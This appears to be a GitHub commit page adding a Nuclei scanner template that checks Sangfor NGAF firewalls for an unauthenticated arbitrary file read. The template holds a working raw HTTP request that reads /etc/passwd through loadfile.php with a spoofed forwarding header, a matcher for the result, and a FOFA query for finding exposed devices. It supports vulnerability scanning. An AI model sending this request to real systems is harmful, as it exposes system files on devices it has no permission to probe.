Merge pull request #8319 from projectdiscovery/sangfor-ngaf-lfi

Create sangfor-ngaf-lfi.yaml
projectdiscovery · Oct 5, 2023 · 4d064e2 · 4d064e2
2 parents bdc537d + 22a07ca
commit 4d064e2
Showing 1 changed file with 40 additions and 0 deletions.
diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
@@ -0,0 +1,40 @@
+id: sangfor-nextgen-lfi
+
+info:
+  name: Sangfor Next Gen Application Firewall - Arbitary File Read
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
+  reference:
+    - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="SANGFOR | NGAF"
+  tags: sangfor,lfi
+
+http:
+  - raw:
+      - |
+        GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+        Host: {{Hostname}}
+        y-forwarded-for: 127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: header
+        words:
+          - 'filename="passwd"'
+          - 'application/octet-stream'
+        condition: and
+
+      - type: status
+        status:
+          - 200